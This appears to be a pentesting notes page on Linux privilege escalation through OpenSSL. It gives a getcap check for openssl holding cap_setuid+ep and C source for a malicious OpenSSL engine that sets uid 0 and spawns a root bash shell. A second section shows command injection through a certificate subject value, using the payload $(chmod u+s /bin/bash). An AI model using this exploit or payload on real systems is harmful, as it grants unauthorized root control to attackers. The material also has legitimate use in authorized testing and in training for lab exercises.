search
The Hacker's Notes
githubEdit

OpenSSL Privilege Escalation

hashtag
Privilege Escalation (SUID)

Reference: https://chaudhary1337.github.io/p/how-to-openssl-cap_setuid-ep-privesc-exploit/arrow-up-right

hashtag
1. Get Capabilities

Chack capabilities in the target machine.

# -r: recursive
getcap -r / 2>/dev/null

If you see the openssl has the capability set as below, you can successfully exploit it.

/usr/bin/openssl = cap_setuid+ep

hashtag
2. Create the Exploit in C

In local machine, you need to have “libssl-dev” to use the header file named “openssl/engine.h” in the exploit. If you don't have it yet, install it.

sudo apt install libssl-dev

Then create "exploit.c".

#include <openssl/engine.h>

static int bind(ENGINE *e, const char *id) {
    setuid(0); setgid(0);
    system("/bin/bash");
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()

Now compile it using gcc.

hashtag
3. Get the Root Shell

Transfer the "exploit.so" to the target machine.

Run the exploit and finally you should get the root shell.

hashtag
Command Injection in Subject

If the above command is executed by root and use values of subjects in any way, we might be able to execute arbitrary command as root.

hashtag
Exploitation

For example, create a certificate that contains the malicious subject value. When the prompt asks us to enter values, we can insert arbitrary command.

Then some shell script, that uses the subject values, is executed as root, our command ($(chmod u+s /bin/bash)) may be executed as root.

PreviousLXC/LXD (Linux Container/Daemon) Privilege EscalationNextPip Download Code Execution

Last updated